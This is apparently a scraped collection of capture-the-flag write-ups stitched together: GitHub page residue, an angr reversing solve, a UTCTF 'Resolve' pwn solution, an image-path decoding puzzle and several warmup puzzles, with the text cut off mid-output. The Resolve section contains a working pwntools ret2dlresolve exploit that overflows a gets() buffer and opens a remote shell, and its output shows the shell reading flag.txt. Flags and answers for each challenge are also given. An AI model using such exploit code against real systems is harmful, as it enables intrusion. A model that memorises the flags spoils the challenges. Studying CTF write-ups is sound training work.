0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path></svg> <span>Security</span> <include-fragment src="/hugoreb/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path></svg> <span>Insights</span> <span></span> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> <span>More</span> </div></summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights </details-menu></div></details></div></nav> </div> <div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " > <div> <div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path></svg> <span>main</span> <span></span> </summary> <div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg></button> </header> <input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div> <div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div> <div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/hugoreb/CTF-Writeups/refs" cache-key="v0:1615746136.3003929" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="aHVnb3JlYi9DVEYtV3JpdGV1cHM=" prefetch-on-mouseover > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template> <footer class="SelectMenu-footer">View all branches</footer> </ref-selector> </div> <div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/hugoreb/CTF-Writeups/refs" cache-key="v0:1615746136.3003929" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="aHVnb3JlYi9DVEYtV3JpdGV1cHM=" > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template> <template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div> </details> </div> <div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>CTF-Writeups</span></span></span><span>/</span>DVC CTF<span>/</span> </div> </div> <div class="d-flex"> Go to file </div> </div> <div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>CTF-Writeups</span></span></span><span>/</span>DVC CTF<span>/</span></div> <div class="Box mb-3"> <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-1 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/hugoreb/CTF-Writeups/tree-commit/2cec1f8a7cc9e3ca83b4a7c558a62c6efcda5691/DVC%20CTF" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path fill-rule="evenodd" d="M1.643 3.143L.427 1.927A.25.25 0 000 2.104V5.75c0 .138.112.25.25.25h3.646a.25.25 0 00.177-.427L2.715 4.215a6.5 6.5 0 11-1.18 4.458.75.75 0 10-1.493.154 8.001 8.001 0 101.6-5.684zM7.75 4a.75.75 0 01.75.75v2.992l2.028.812a.75.75 0 01-.557 1.392l-2.5-1A.75.75 0 017 8.25v-3.5A.75.75 0 017.75 4z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2> <include-fragment src="/hugoreb/CTF-Writeups/file-list/main/DVC%20CTF"> Permalink <div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> Failed to load latest commit information. </div> <div class="js-details-container Details"> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block" data-pjax> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div> <div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>WriteUps</span> </div> <div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div> <div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div> </div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div> <div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>[PWN]Kanagawa.py</span> </div> <div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div> <div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div> </div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div> <div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>[REVERSE]Crackme</span> </div> <div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div> <div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div> </div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div> <div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>[REVERSE]Rocca_pia.py</span> </div> <div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div> <div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div> </div> </div> </div> </include-fragment> </div> </div> </div></div> </main> </div> </div> <div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-fg-muted border-top color-border-muted "> © 2021 GitHub, Inc. Terms Privacy Security Status Docs <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> Contact GitHub Pricing API Training Blog About </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></div> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> </clipboard-copy> </div></template> </body></html>
**Static analysis**```$ file rocca_piarocca_pia: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=0e2862fed0acfbbc7e8117b7e6206a11e508c737, for GNU/Linux 3.2.0, not stripped``` ```strings``` command hinted that the possible outputs are "Nice try" and "Nice flag". After viewing the disassembly in Cutter, I noticed that the "success address" (address that will lead to win) is 0x00001286, and the "failure address" (address that will lead to a lose), is 0x00001294 Based on this information, I wrote a short angr script to find the flag:```import angrimport claripy success_addr = 0x00001286failure_addr = 0x00001294 flag_length = 32 # estimated length proj = angr.Project('rocca_pia') flag = claripy.BVS("flag", flag_length * 8) state = proj.factory.full_init_state( args=['./rocca_pia', flag] ) sm = proj.factory.simulation_manager(state)sm.explore(find=success_addr, avoid=failure_addr) for end in sm.deadended: print(end.solver.eval(flag, cast_to=bytes), end.posix.dumps(1))``` Output:b'dvCTF{I_l1k3_sw1mm1ng}\x137\x137\x137\x137\x13\x00' b'Nice flag\n'b'\x00\x00\x00\x00\x00\x00\x00\x17\x001\x003\x93\x00\x00\x01\x007\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' b'Nice try\n' BOOM!Flag: dvCTF{I_l1k3_sw1mm1ng}
# Resolve **Category**: Pwn \**Points**: 980 (46 solves) \**Author**: trab ## Challenge Yeah you have an overflow, but where do you even jump to? If only there wassome sort of way to find the address of system. `nc pwn.utctf.live 5435` Attachments: `resolve` ## Overview I threw it into Ghidra and got this:```cint main() { char buf[8]; gets(buf); return 0;}``` Wow another tiny pwn challenge!Let's do `checksec`: ```$ checksec resolve[*] '/home/plushie/Programs/bbb_writeups/2021/utctf/Resolve/resolve' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)``` ## Solution The challenge hints at ret2dlresolve, which should work since there's no PIEand stack canary.Luckily I saw a super elegant ret2dlresolve solution by theKidOfArcrania to[babyrop](https://ctftime.org/task/14690) from DiceCTF, so I just edited itslightly and it worked! Pwntools is so powerful sometimes it makes me feel like a script kiddie lol. ```pythonimport pwn pwn.context.binary = e = pwn.ELF("./resolve") # p = pwn.process("./resolve")p = pwn.remote("pwn.utctf.live", 5435) if pwn.args.GDB: pwn.gdb.attach( p, gdbscript="""break *(&main+29)continue """, ) r = pwn.ROP(e)d = pwn.Ret2dlresolvePayload(e, symbol="system", args=["sh"])r.raw(0x401159) # ret gadget to align stackr.gets(d.data_addr)r.ret2dlresolve(d) payload = pwn.fit({0x10: r.chain()}) + b"\n" + d.payloadp.sendline(payload)p.interactive()``` Output:```$ python3 solve.py[*] '/home/plushie/Programs/bbb_writeups/2021/utctf/Resolve/resolve' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)[+] Opening connection to pwn.utctf.live on port 5435: Done[*] Loading gadgets for '/home/plushie/Programs/bbb_writeups/2021/utctf/Resolve/resolve'[*] Switching to interactive mode$ lsflag.txt$ cat flag.txtutflag{2_linker_problems_in_one_ctf?8079235}```
# DDR First thing that came to mind looking at this picture was that I could follow some path starting from the center arrow, and then use 0 or 1 from the tiles background, which would encode a message. Unfortunaly, I quickly noticed there are some loops in, and therefore took a step back. I then looked closer: each tile actually has a different grayscale level. Maybe they encode different things? I suspected that we should start still from the red tile, so i checked the next few tiles in the sequence. Got it! They have grayscale values of 0x61, 0x6C, 0x67, 0x7B, which reads "lag{" in ASCII! Therefore the red tile is the "f", and we can read "flag{" to start with. I took a risk and assumed that if I run the path from here automatically, surely the flag will appear (otherwise, well, F, i can try something different). Next step was to automate things quickly. I took the RGB values of each arrow at position (6, 32) in the tile because that's the position where, for any arrow type, we still hit a unique color identifying the arrow. Then I just use the directions to traverse and read the grayscale code of the tile and convert it to char. Loop until we hit an "}" character! ```from PIL import Image # parse direction from colorsdef getDirection(colorCode): r, g, b, _ = colorCode if(b > g and b > r and r > g): return "up" if(r > g and r > b): return "down" if(r < g and b < g): return "left" if(b > g and b > r and r < g): return "right" return "ERROR" # pixel that always hits the arrow colordef getColorCode(pix, x, y): return pix[6+64*x, 32+64*y] # decode bit to get ascii laterdef getBit(pix, x, y): r, _, _, _ = pix[1+64*x, 1+64*y] return r # load pixelsim = Image.open('ddr.png')pix = im.load()print(im.size) # start from one step ahead (skip the red square, it's "f")x = 11y = 7curr = 0flag = "f" # until you finish the flagwhile chr(curr) != '}': curr = getBit(pix, x, y) flag += chr(curr) dir = getDirection(getColorCode(pix, x, y)) if dir == "down": y += 1 if dir == "up": y -= 1 if dir == "left": x -= 1 if dir == "right": x += 1 x = x % 21 y = y % 15 print(flag) # BINGOprint(f"\nfound it! {flag}") ``` We get a very sweet output as the path is taken! ```(1344, 960)flflaflagflag{flag{2flag{2aflag{2a4flag{2a4cflag{2a4c6flag{2a4c67flag{2a4c670flag{2a4c6706flag{2a4c67067flag{2a4c670674flag{2a4c6706740flag{2a4c67067402flag{2a4c670674023flag{2a4c670674023bflag{2a4c670674023b9flag{2a4c670674023b97flag{2a4c670674023b972flag{2a4c670674023b972fflag{2a4c670674023b972f4flag{2a4c670674023b972f4eflag{2a4c670674023b972f4efflag{2a4c670674023b972f4ef2flag{2a4c670674023b972f4ef2bflag{2a4c670674023b972f4ef2bcflag{2a4c670674023b972f4ef2bc1flag{2a4c670674023b972f4ef2bc19flag{2a4c670674023b972f4ef2bc192flag{2a4c670674023b972f4ef2bc1922flag{2a4c670674023b972f4ef2bc19224flag{2a4c670674023b972f4ef2bc19224eflag{2a4c670674023b972f4ef2bc19224e2flag{2a4c670674023b972f4ef2bc19224e25flag{2a4c670674023b972f4ef2bc19224e25} found it! flag{2a4c670674023b972f4ef2bc19224e25}``` Overall, I was gonna be fooled by the 0 and 1 thing. Lucky enough I didn't think about the Dance Dance Revolution game and just went straight on following the arrows and decoding something as I'm doing so!
# Warmups Here are all my solutions to the `warmups` category, except for `Eighth Circle` ## Veebee I use Windows, so I just ran it: ![not_easy](./not_easy.png) Just click through the second, and here we go: ![flag](./flag.png) Nice! ## Chicken wings We have this encoded flag:```♐●♋♑❀♏????♍♏⌛?♐??????♍????♌?♍?♋?♌♎♍?♏❝```This is wingdings and we can decode this [here](https://lingojam.com/WingDing):```flag{e0791ce68f718188c0378b1c0a3bdc9e}``` ## Shoelaces We have an image of shoelaces, I just ran `strings`, that's my instinct to check for a flag right away: ```strings shoelaces.jpg | grep flag flag{137288e960a3ae9b148e8a7db16a69b0}``` ## Car keys ```We found this note on someone's key chain! It reads... ygqa{6y980e0101e8qq361977eqe06508q3rt}? There was another key that was engraved with the word QWERTY, too...```So this is definitely a `QWERTY` shift, I used [this]():```foak{6f980c0101c8aa361977cac06508a3de}```Just fix the prefix```flag{6f980c0101c8aa361977cac06508a3de}``` ## Buzz ```You know, that sound that bumblebees make?``` They `zzzzzzzz`, just use `7z x` on the file:```7z x buzz 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,3 CPUs Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz (806EA),ASM,AES-NI) Scanning the drive for archives:1 file, 45 bytes (1 KiB) Extracting 